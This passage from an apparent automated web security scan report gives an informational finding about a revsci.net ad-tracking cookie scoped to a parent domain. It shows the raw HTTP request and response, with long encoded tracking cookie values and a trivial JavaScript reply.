w1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_X-Vm="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/kolpijKV9WP6iKbjeS5HxvCqNxuS+n53chVn375OtJkct16E3zcnedDEwiYGhrf99bXY2VOe9PIcfFRS2PcJjZ76CNb59+7WXNQT64fRmUTi9VezQ8bOK2/nv1q/9t4pBkpsY3a2dooZenCfPQZfnYd5Um2zcjudTaQ3RVUGk3KMHdZ1Ye2N9wk3RroU+uIDNXUGinDVK92bbAGO9AJFLSNcifFEjBngVchYsV3xvLK1e1+4kAQc+VsiKiWx4ugdiQJoJDeUyW7YzQI6fqidngw18KB09EKGA8vkUoqTK9msnqYucf1pQ2egkHrhKLBg6neQtHrpPaVsRHECjGL+ksYDAvKYs1lEidhNI3b6Al9V26gofwQHwPsa11BqM9GXJ0JNpcn3vRG8CVgssuF5b6NJ2ObbSbe+jbk+qFH9udHII8LDIGPDhwxO2sZMsZ/PJyke3oifjYUpgFWf1QAVj3tAIZeoIiCAQmhzEqtSGZqUEhG6RU4E1UQ0pi/dWyM4OxTOXQcl5jXhHqVByOstfp5W6Cm7UXxA8gQu5VLnDTBix+8NRxhGeshbwhMgdxXCwo3cby/GMMhwSwjko7rShKdgGJ1KzVm8ay6OEM91LzGBbw255SM8jacgi91enw0YZxW/2jG9Ij8R8ZugHakyp7ZnmI+W/4mLjKaZziEo5EtQro7hXu522HcnMhst/AMsGcwSXuuU8nU4VcgyOJRnF/igkXvDOck1+mxEP0SPpxQdssYpIYBGGtoVg02dLVwcYTE8ITYtSr0Yp71uPCw0A4XvODYSG/jc2YQH+OFwxBNIxZgnJiILxEggr+4Ijede1uIkZgPeN61MerdEf2zgo/wdzZQvAusf2Ri0oYmFYM1lco0Hd0vcLdfaci+/vTxkL2YOaJlVn1xEzZquMI/s3cBYIiA3wh2J9MT2NuuAlB2P5rGaWGMN8eq5cteyFgrvxxEQivxwQiteFlp4untiyd5ZdNEJkhiXwmEaqMkXHziyFVZddoe5NcDYV93nBFXSD6lt40Mu2IobQwRLd2lX/ZB/5v6qA9F9UyZrf0FyR12o9VI7MNSWubAFC0F3jWU39DQAyE+jQP4vJReUnpptgIIJSovJgpbM7F1ZcTQLQw6tHXKfwzRtURbTYTKS2kUkkRqLFQ23uEC73ed7a4NZVRGzrZTj4W1NPs6cv7jfqFrCHUS7gfkM0lF7vZcCtSJWp+5IWWcHGn5UQO3PDetSo3R+ExmRtFCbJXYX+8KopiDHADAHxB+2MQSaM92HNS5Bb+6s0MwxEcGM2+2nF31VCTxzuqtDfk6dwdmDQaA=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8q/n8RHJiFTfZw+jQwUrfBzwzrIW0ureJ25b5YehdNusyWJc89gy6TLjFS1UFbVOz0I2XXULOcyVpqXeznR5SPpCyppabSjZBvtjNwGjsVCWufr4E5bfOjNdHiuM3eL7xfGwW4Rv+04e5eRHTByQ9gkvih/99PNVJg0MjSaTYbutzif0HMZEIpUgm+iFZVc73uuJ2rxrinsBIG02t4xzDqFArLXC7s28azBDzzCBInGdTqTd1PhCKdcK+CU51WYfvKBr6V0frnbF9EyB5Vp1g+XCjB0QI2GwcbKe+9KEl3jKCiMjN3k14zgswm4uqB97k78RIEAXL6kMQguxVmt59rl8bUbMEHiltuhaEHds27E2i02AyNvHEi2eW79N8nSX1I8L/f1JR9mfd3yHb0Tu3dmdH+QG2WnIPM7gfAUH+uXCIKT+Lb5WBWdUKcbzrqDbXuJQ4bJLDEun2uFVQDaj01mVbl6WWS4n/R0TOW3wyhH7P4hlwLnKTc262p7SI32tKRDNFMaxhYxVcI7bMzrH93p6UpsIp6QxarjdrHQgs8YUJCIRRMMMjJP13Xu2JCZakMvJ6QV11ug0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8cKftJU2Oz+XW6cIp31v7WdY/TB/Sp9trPbqnLiuN+6RDNM07iD7sMpLvBwkmVDE87uLN4wdVwbyfrduRs9SJKdkL90o3EiV4+B3kpAW9b97VUQXHUZJQC+LsyNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSoS3eczYGxbpw58MVPrgttMshoZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSZHAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mlic9tf7EAEPypIFpx5mxA7YgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKosJHSGZ0I88VCnJgG0zOE03AF6VgK1GDzjxJ351lfepZljBEfp6Cp31rZKRLBIqBzhyxPDcA745426LFm6X7WNHjUOmboXIuSk/eRVFmc6e/UvaQ0owaSsohEi/uYA1DBSmqX2RkOIpQLuI6/7Wy7PqB8m7FFmMFPzADhVakWhSUZenh3zyWj/t4ict5pTGLqfE9Ff8NZJPWN/HBU2jOi3M4aFXtWhEowbYTvMtXCPaxNvTvL9ZcGD1fbxRhf2wFrv5BnjzwIYwtFkc80+3b8buT7Qb28xkayJlh1wqLoZ3GSYslp0MyXokG0mhx6R7cyVYgVhuwK9pY+z0EUUFS1ok09IVoJE+Y8RMUxRRlGJdXYgygsTSFzV0EzCGuxqwwojaikGI0bQDf6th4LkA+Lh5BUmnF+VFde/nBTudF8CVrgPXnvvalZTsmyVf/sh/nvqomW23mnwe5B4XqY5ZAJZXDpJ3QS9rd33I1VhizTY6RcfrBiO/AWrPGY2V/5GdMzfdR2tIGrbO4kUVYZhakJuOVvP7IQ7IVx9VH/GTPWmYZ18GRlQfxaZ0ug3N047fOWVVIrlpaQvatzm0Px7l4SKuxAk0P8IHNihP7OYMTxOn7drssM1Sx03vsISXH69THMmHuEBu92lXB5iD290d4E9pe7qOv2R8A4nTsDFsudW1bi9Gg0IyHmPq2uqUa9K2Qk6YyzAv1sxMW1uDnKqaNFLpLLTx1IcwlF53Fwe3JAg4Jdpne2HE6HhCQooMFH6mJf3ItJC5tST"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZ/CUcpjjzqGdT3d1+5L1IVLI7RC4ixllF3Bz0cxCc11lA/2HcBYprQebCO/plJjQNO11QHjfkbkXXttKTYYCqGMEVIWz+D34DrVPrSrYNmtfrvMWls5djIyniMU8QmN0CQ1ao85QIleMz4eApkV50rezutkGsXT4A8oOARlmtCXp3KVmsluPqtpjQL1jgHAqSyn4KyqBeWeprePIMF7AcXmi2UZMiwOsKYzIszBY7xQXHhc7yzX/uLrFPyHhj8AmRYnHFtuABz8ZSEsSdoOor4M3kBMiA868iPnAipsx49t0m73AuXYc7UFxfTpfs93W/WHwnPJThZmTvo4fHv1sFElaVZMwQ8GPkcRPtqErQCZ+aBJaleQc9wrFT6wCDyeOebcj6EXlCQB38ieBqCmynEkM9QEyXJNq8m5PF1sTw1YeyHLUnt/2ABbpCXjZEH2mRg/5Yg6TNOyo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp7h79CrB4Ypq8bZnedKYjOdeMOLsfi9HQE4saI/5RCJ9y8KLVFBw8+lYpjeoXfA1XWRQVqFbpXIMebkFXbQTE0xZdhpXd5uEOtyRc5a9K0dGFurx7gbrpmSvOkvWFCio+FP0JQCTYI/GDlR49/dY9ZfMvjNnvHmhLSbOD53X/RpoOV+D6ALESZffv/i0W97GqjPQl/Kqwta7Xdie2YUVoBUFjm2t0nNgDo+J3dP7Gt3ux82wtMOhk5x6cxdWutYa3kuEk6WTSaxb70PIiEUKLccPI1VuCaDDvg1Edipckrskd1Nb6rxmRcc+f4M8WJ2UQMlHGOaxigcXc4y5OkRY6hyts5L0VV44xa9kOSOGtNl1XmFcb5itfqZcNSgUDe3KrPyZ8TiE7cd+rDIi6bGQAwxkT6iazM2fg6WACXbPyCvVQfzKy25O2Rfo4nUNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:27:35 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:27:35 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/603496051.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFJMOhOXMMVp94u+w/BbtOIGssYybrEIYgJmILsDQmufM9tNd4heJ7St7GX0DL0+fSjWL4XJG/NmHtFFZTHJrhAyDWa82kosKQcxXrWXnZ9nEjIXlwYOmjESzd9K1IVGd6yr0pIiCX3oOM0f+CYs2MLsSkzWzEMWf0Dk+vnMzjToirR+oqwo1fYxUnihSYL10mZ627ZmDsJv0qGr+x9IESn+gi06KDUANyZZamHRg1+kg7nPIWOKW59rU8VqpGQkiNFkNQ+nnETaiCV0VyhtGgmctLQkdAYPMG+jXXDNqBRltnr+K1SsA0KoSWLm27MmWCxuYgkbd2diaVR4aNMzb6TfrfkbpDAEs8CKGpUM4TQCV4eriWxzqA3nvNEvWovfZL30egkaVf9sCZNF62Xav+TZkm/QCFAMR47GMWR2zOrlrsimIH8qxmGyCyCPDrvW+1UO4Shots5vZJd6y5+6nIEkClYj0JmdY/nZDqii9Szmne8p1u0cswdBsKj2Vee1RKvmSTE/Zz57GCSlsXr+qOFnO5jJ2Id5hN6VCi8cDciF/ZX4Cs71KJ2qHUBLQyRxAKhOlVnN+lGd11ePCUCyoyqxCtbG6eC95RH9v496KovSxzm63+RtkWUDxjRPUfu+sGfTdHORhXbtAi0nSVQxHZKv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:41:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/603496051.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_ItMH="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxvQBCSgV8PQmydD/DJkwvCcofHviSJhCx0m9ijAdBvbrW928CY8vrcf4As6hj1VY7tYYo6XaMjOy/KnjNO4QF6V3+avmZSgOJjmNs+AI0tedg9vyn96xGM+Htx8nxiyOhiPMWeX113EHW8bjJJvYOrTF9VtmbzAOXEak4yvi+AQBQLjQjkttW/c7fQfbquvUuU6mKoKTnWX0i0F0uplLLEr8ZDi9iORfBqOBWCak+3y1yBrzF1kFykev1v7eIXaIaz2m0q4CRXrRlUk5uwJcfuwz6OUkf+YTnYCEXPdShIuxC2KEUaVXyRmdeibvDJVchI3hg22JBX9k7O4jOm20BEhBudXxU6M2vt94ltCZ9CAQmU/x3pCgEIatwztrARKuEsnxzFsP/4JF9ztGQq8ubnpGyAu3WwQYWPEvPjvmJDV8+TMW5ml6EYrR/yhh+jx1rS10fjv0zBKcqtpba7adQanHP4Eto8avVna43raizD/MpCireqvUOBmpYa/7idyAe75KPhINw8w1v7PlWpvC5ZuAe/Si5g4ss+ZuUt5iePefo+3iUt90PWFxgYCUhzF4upJLawaUDkoG1OKQwkJjjjOImZMwGv9peAGL0NlouFZ5YRWraUiANFWUh26zyhwej5Zjau4XLRe27b7hZeyw5XXibCBVyUJxmc9kpKVYvIfNkIBEi4RfB8gISQ3J7qBG0863SADLJ9XSYtckDqCtlE57kFwe2if/zwVxuskFcRKGpYskh2dBgxsTS09NSZgesCIv71uNWEgH3d1UuKIkd+secbXIjQv4aA3q/uItdGXvozfIFIHqGkkewKr1okgrRwiuyUf7cBri7ApzRkmzR4lQXGgfBMam5WfKbaqahdws5pSPOI4IaHC5rX94eS3sRGFz7LKRP3jMjRdCuA66JcSlTv2lDuFwPPNVFboia29gO9NAdfLEKPWVNzAhuV0NiZeVnN09j/79cp0ZRVhoxyW4ckX/KU6S0C00KYgAurohiSl0jeVyLcIZRK8gYrhdMkkqufCheW0yUB+4gkGeup9yMbO+f3+VlM7O9dPLgE0hw/R7POwp5gAz8zGJAzl0CyZUJNqkwP/ovzUFTsdz6xcyd4A1VYAp1qYCQ7brhgwBCry+Rqty10l6D1MUdupR4so7R9KC8EH9vCY405ntkwQGIWxHBDGnQe0xRNBoET/WDOIq3ONIHbjq0BwblcTQmxu6N80Dm5SSGQrz4f76Nj3RKQCHDMwX1fPUOEvDAgvLXuss43FP7rIFSehzMADW8QtOAcme2VudShOGypaxrSB7oMsm"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+aoza6CajwOfu2Ls8do6UXNNLzEGyW7PxalbAPoCsJfF+4tnPpkU0eowGIXMaJKu9H2QeMfaE93uR2owlQwlezV4otGV6+xKW95Qy/WKU7YoaQv2VLQmhi1LpKoztjENxlTM17TU7zT4nwiQ4oRnPnFK89XPRmRR4IWScXBOcCuxjIQdkLEY01nS13tB3wtTOwQKZEwaeSALCIxbuuJEfX75zmpsCYE1Wt4xzFoFArDXD7s2+azTDzyiOJXGdTKzd1bhCydcK+D251mcetKBr6VwZrmrF9EyApdp6g8XCju0QJWGwcbKe+a64i0iKCiMjM2U548QswmYutAebkL8WIEAXL6kMQguxVmt59rl8bUbMEHiltuhakDds27H2i81wqNvHEi2u275N8mSnVI8L/YVJRdufb7yEj0Pu3cGRG+QGWWjIPMriZEX5+uX+PKT8wkef6qJv41N8V/+XVairyKSWfpkM/1XuGJKiCj2Jq3FqgPYh46Q3yKxGiXFM7/lwTM+C572bpGTlh27PXsn6sNX8Nl0znDDDQDqqdgXhenhqPFP/31zTBQj1s08Sb3kkFY7Zb/w1LBu1P/qZKBO/APNzZsFW5EMuaWQNWLnhnOG7ODQ08Hsf2cxaNPE3eIUcXU53S9/Ic0aPnfLLRQaGVI3EFn7Pg/+HQYhgerqPqviapJ7py8T57jhhvGv2q1UU285brdKZ4QmKyOgSgli5GeLd6OWzLaOoBm5MEPJ4CfEw304xStklm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xaMiEx/g3zo8f8LyCSqwscxIVtB+Mwv0jFEprhvzuE0kVIS28+gd2bm+WTGHVOCMciv9JataWaBZQGfs6pUvPzds1P7KLx+gwGiX2jwbQZBbGyjxy5Ia+BODCRc7SrZGeKnnpYfoIxNaRDKG7ninMFwF5gUNLyPVADN9lLUNfpYq+grb8oDHjfSm85aXJIZVmsbUl4N1jHwLxU5v+/s7YjN55ddodLDL7S0NQwPbYOWgSarqjgKLvS9VuAzK1B4LzbDSrujmBo90PvjAr74jA4OKswU48Y+NYg7EYLi6On3vK5vyl6abTG1oxpzL0W/j269fn6YrnC4njPKnQQPD7xe5mP2vcDrgSglVqECp3A9e3w+viKkCauSvhULTTTRPcrVrmm6erhDIBJMZyVPEshPni0Cdban97UbFuBHrVS1E8ARXWvGCC42WvvoFv+uDZulilLjTEDQRp3Fm/mcZ7cfhywkpmDlJjbvOItIQioJpoVtHrRlb/MVNten2i2s3xfPenL6FAjxYnabyXvDhfZTgYPp40+EUF6uURAWwYp05qvjx6mO5nvqo1imnq8D6hgpRlluZc9F5xNMb/zWeVKgl/QwCCrWd2j6o+bm3iHkNeX6Ys29uMKYQAtKtbd0XZDbJdqlGgMaSGGp2PJI1nl6PZ4iZyjNGhHtBS7jl7/ACK3vLdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGvkahZUCkLdl0A9bbN7i3NdfCl4fe/IZ7ZPiCGWcLU0WIoIN98K/w7FHxjoO2PTO3J3nTAaR8qJET228LxizK/uw7Hh1S5Rjlo/R+AAV5Fs38KmUoIPecSxIu5iOF+0u7aF5G17uoghaIpaI0lL4NuARTAv9gyBWFxBToZ770RQmrpOXuey3NTTPRpoK1p6l7BuW96hif0G5EeUReJrMnT4fm2In57ZJ6b/MRCg=="; 